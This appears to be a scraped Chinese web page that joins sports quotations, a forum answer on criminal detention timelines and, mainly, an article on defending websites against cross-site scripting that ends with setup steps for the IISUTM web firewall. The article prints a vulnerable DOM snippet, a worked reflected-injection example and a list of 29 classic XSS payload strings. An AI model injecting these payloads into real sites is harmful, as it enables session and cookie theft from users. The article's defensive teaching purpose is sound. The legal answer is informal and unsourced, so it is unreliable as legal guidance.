48、轻视体育的民族,是落后的民族,是挨打的民族,是衰亡的民族。
49、运动方法无数条,因时因地因人挑。
50、缓慢而有恒赢得竞赛。
51、踢踢腿弯弯腰,病魔吓了逃;打打拳,练练操,寿星见了笑。
52、当一个人受到公众信任时,他就应该把自己看作为公众的财产。——杰弗逊
53、缓慢而有恒赢得竞赛。——莱特
54、体育能给你带来更多的幸福。
55、发展体育运动,增强人民体质。——毛泽东
56、体操和音乐两个方面并重,才能够成为完全的人格。因为体操能锻炼身体,音乐可以陶冶精神。——柏拉图
57、刀越磨越亮,人越练越壮。
58、如果你有无法解决的烦恼,去参加体育运动吧。
59、运动是一切生命的源泉。
60、高尚的娱乐,对人生是宝贵的恩物。
61、生命在于运动。
62、体育运动可以使人健康,而健康是财富健康是幸福健康是美……
老公因诈骗被刑拘,现在23天了,是不是一个月后就会通知我怎么判的了
不会!侦查阶段除了逮捕后二个月,还可以延长羁押期限,最长好像是四个半月。
而审查起诉除了一个半月,还有二次退回补充侦查,一次公安机关有一个月的补充侦查期限,重新移送审查起诉又可以一个半月,即从检察院审查起诉到起诉到法院可以六个半月。
法院的除了zjhzxssb所说,实际上有很多延得很多,有诸如附带民事诉讼调解不计入期限,调取证据的时间等等,能起诉后半年内判下来就不错了。
还是请个律师吧!
哪有放XSS跨站脚本工具的第三方工具/
不修改网站程序,使用第三方工具来防范XSS跨站式脚本攻击
网站要怎么防范常见的XSS跨站式脚本攻击呢,我们先从XSS跨站式脚本攻击的原理来说起。
网站遭受XSS跨站式脚本攻击的基本原理
1.本地利用漏洞,这种漏洞存在于页面中客户端脚本自身。
其攻击过程如下所示:
A给B发送一个恶意构造了Web的URL。
B点击并查看了这个URL。
恶意页面中的JavaScript打开一个具有漏洞的HTML页面并将其安装在B电脑上。
具有漏洞的HTML页面包含了在B电脑本地域执行的JavaScript。
A的恶意脚本可以在B的电脑上执行B所持有的权限下的命令。
2反射式漏洞,这种漏洞和本地利用漏洞有些类似,不同的是Web客户端使用Server端脚本生成页面为用户提供数据时,如果未经验证的用户数据被包含在页面中而未经HTML实体编码,客户端代码便能够注入到动态页面中。
其攻击过程如下:
A经常浏览某个网站,此网站为B所拥有。B的站点运行A使用用户名/密码进行登录,并存储敏感信息(比如银行帐户信息)。
C发现B的站点包含反射性的XSS漏洞。
C编写一个利用漏洞的URL,并将其冒充为来自B的邮件发送给A。
A在登录到B的站点后,浏览C提供的URL。
嵌入到URL中的恶意脚本在A的浏览器中执行,就像它直接来自B的服务器一样。此脚本盗窃敏感信息(授权、信用卡、帐号信息等)然后在A完全不知情的情况下将这些信息发送到C的Web站点。
3存储式漏洞,该类型是应用最为广泛而且有可能影响到Web服务器自身安全的漏洞,骇客将攻击脚本上传到Web服务器上,使得所有访问该页面的用户都面临信息泄漏的可能,其中也包括了Web服务器的管理员。
其攻击过程如下:
B拥有一个Web站点,该站点允许用户发布信息/浏览已发布的信息。
C注意到B的站点具有存储式的XXS漏洞。
C发布一个热点信息,吸引其它用户纷纷阅读。
B或者是任何的其他人如A浏览该信息,其会话cookies或者其它信息将被C盗走。
类型A直接威胁用户个体,而类型B和存储式漏洞所威胁的对象都是企业级Web应用。
网站遭受XSS跨站式脚本攻击的基本方式
1. DOM-based cross-site scripting
页面本身包含一些DOM对象的操作,如果未对输入的参数进行处理,可能会导致执行恶意脚本。如下面一些DOM操作:
document.URL
document.URLUnencoded
document.location (and many of its properties)
document.referrer
window.location (and many of its properties)
举个例子,假如某个脆弱的页面的代码如下:
HTML
TITLEWelcome!/TITLE
Hi
SCRIPT
var pos=document.URL.indexOf("name=")+5;
document.write(document.URL.substring(pos,document.URL.length));
/SCRIPT
BR
Welcome to our system
…
/HTML
攻击者使用如下的URL访问时,则非常危险:
;scriptalert(document.cookie)/script
试了一下,貌似IE、FireFox等浏览器默认 对scriptalert(document.cookie)/script进行了编码,阻止了脚本的执行。但是对于 DOM操作还是要更加谨慎啊,比如把上面的页面修改一下,安全性就增强了不少:
SCRIPT
var pos=document.URL.indexOf("name=")+5;
var name=document.URL.substring(pos,document.URL.length);
if (name.match(/^[a-zA-Z0-9]$/))
{
document.write(name);
}
else
{
window.alert("Security error");
}
/SCRIPT
2. Reflected cross-site scripting
也被称为None-Persistent cross-site scripting,即,非持久化的XSS攻击,是我们通常所说的,也是最常用,使用最广的一种方式。它通过给别人发送带有恶意脚本代码参数的URL,当 URL地址被打开时,特有的恶意代码参数被HTML解析、执行。它的特点是非持久化,必须用户点击带有特定参数的链接菜能引起。
3. Persistent cross-site scripting
持久化XSS攻击,指的是恶意脚本代码被存储进被攻击的数据库,当其他用户正常浏览网页时,站点从数据库中读取了非法用户存入非法数据,恶意脚本代码被执行。这种攻击类型通常在留言板等地方出现。
实施方式
我们来试一把Reflected cross-site scripting。当我们在某网站输入参数XXX,发现参数XXX原样的出现在了页面源码中:
1. input type="text" class="cd61-903b-b6ae-5f7f Seach" name="w" value="XXX" /
OK,可以开始做文章了,我们将XXX替换为:abc"/scriptalert('haha')/scripta href=",返回的HTML代码如下:
1. input type="text" class="903b-b6ae-5f7f-1540 Seach" name="w" value="abc"/
2. scriptalert('haha')/script!--" /
这样,scriptalert('haha')/script被执行了。这里再举例一些XSS攻击行为:
1. IMG SRC="javascript:alert('XSS');"
2. IMG SRC=javascript:alert('XSS')
3. IMG SRC="javascript:alert(String.fromCharCode(88,83,83))"
4. IMG SRC="jav ascript:alert('XSS');"
5. SCRIPT/XSS SRC=""/SCRIPT
6. SCRIPTalert("XSS");///SCRIPT
7. iframe src=
8. INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"
9. BODY BACKGROUND="javascript:alert('XSS')"
10. BODY ONLOAD=alert(document.cookie)
11. BODY onload!#$%()*~+-_.,:;?@[/|"]^`=alert("XSS")
12. IMG DYNSRC="javascript:alert('XSS')"
13. IMG DYNSRC="javascript:alert('XSS')"
14. BR SIZE="{alert('XSS')}"
15. IMG SRC='vbscript:msgbox("XSS")'
16. TABLE BACKGROUND="javascript:alert('XSS')"
17. DIV STYLE="width: expression(alert('XSS'));"
18. DIV STYLE="background-image: url(javascript:alert('XSS'))"
19. STYLE TYPE="text/javascript"alert('XSS');/STYLE
20. STYLE type="text/css"BODY{background:url("javascript:alert('XSS')")}/STYLE
21. ?='SCRIPTalert("XSS")/SCRIPT'?
22. A HREF="javascript:document.location=''"XSS/A
23. IMG SRC=javascript:alert('XSS')
24. EMBED SRC="" AllowScriptAccess="always"/EMBED
25. a="get";
26. b="URL(""";
27. c="javascript:";
28. d="alert('XSS');"")";
29. eval(a+b+c+d);
总结一下,要防止XSS跨站式脚本攻击主要是要在查询字符串(QueryString),表单数据(PostData)以及Cookie甚至HTTP报头(Header)中防止掉一些javascript关键字和一些敏感的字符(单引号,分号)以及SQL语言的关键字,以及防止他们使用encode编码。
用ASP或者PHP脚本来实现上面的这些想起来就很麻烦。下面就来介绍下用一个第三方工具IISUTM来处理上面我们说到的问题。
准备工作:先去下载最新的IISUTM版本。
根据IISUTM网站防火墙安装及操作手册 中的说明把IISUTM部署到你的服务器上来,这里需要注意的是使用Windows 2003+iis6的服务器,需要开启iis中“以IIS5.0 隔离模式运行 www 服务”选项才能正常使用该软件。
安装完成,通过浏览器访问IISUTM的配置管理界面默认的是,这个是私有地址,只能在该服务器上访问,你需要任何地方都能访问的话,可以在安装的时候IP地址的选项那里填入你服务器的公网IP地址,和你所开放的端口。这样你就可以通过你配置的地址进行访问,或者你可以在iis中直接管理名为IISUTM的站点。
登陆管理界面后点击上面导航栏中的“基本设置”,然后点击左边菜单的“防XSS攻击”链接。
开启该链接里所有的选项,选中之后IISUTM会自动保存配置,下面的“使用不允许的发送序列”是该软件提供的XSS攻击关键字的特征库,你可以根据你网站的情况进行更改(最好不要修改)。
确认以上的配置以后,你可以返回到IISUTM管理界面的首页,这里会列出最近服务器遭受到的攻击以及详细,赶紧去看看你的网站是不是随时有人在进行SQL注入吧,以及哪些攻击被IISUTM处理掉了。